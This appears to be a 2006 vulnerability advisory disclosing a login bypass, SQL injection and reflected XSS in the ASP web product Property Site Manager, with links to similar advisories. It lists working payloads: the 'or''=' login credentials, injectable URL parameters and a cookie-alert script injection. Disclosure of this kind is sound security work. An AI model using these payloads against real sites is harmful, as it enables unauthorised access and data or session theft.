Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection MetaCart e-Shop [multiples injection sql (get & post)] E-commerce Kit 1 PayPal Edition [ injection sql ] TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De letion & Command Execution Vulnerablities From:laurent gaffié <saps.audit_(at)_gmail.com> Date:16.11.2006Subject:Property Site Manager [login bypass ,multiples injection sql & xss (get)]vendor site:http://www.mginternet.com/ product:Property Site Manager bug:injection sql ,login bypass , xss risk:medium login bypass : just login with : user: 'or''=' passwd: 'or''=' injection sql : http://site.com/asp/detail.asp?l=&p='[sql] http://site.com/asp/listings.asp?l='[sql] http://site.com/asp/listings.asp?s=search&typ='[sql] http://site.com/asp/listings.asp?s=search&typ=4&loc='[sql] xss (get): http://site.com/asp/listings.asp?s=</textarea>'"><script> alert(document.cookie)</script> laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: saps.audit@gmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection
MetaCart e-Shop [multiples injection sql (get & post)]
E-commerce Kit 1 PayPal Edition [ injection sql ]
TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De letion & Command Execution Vulnerablities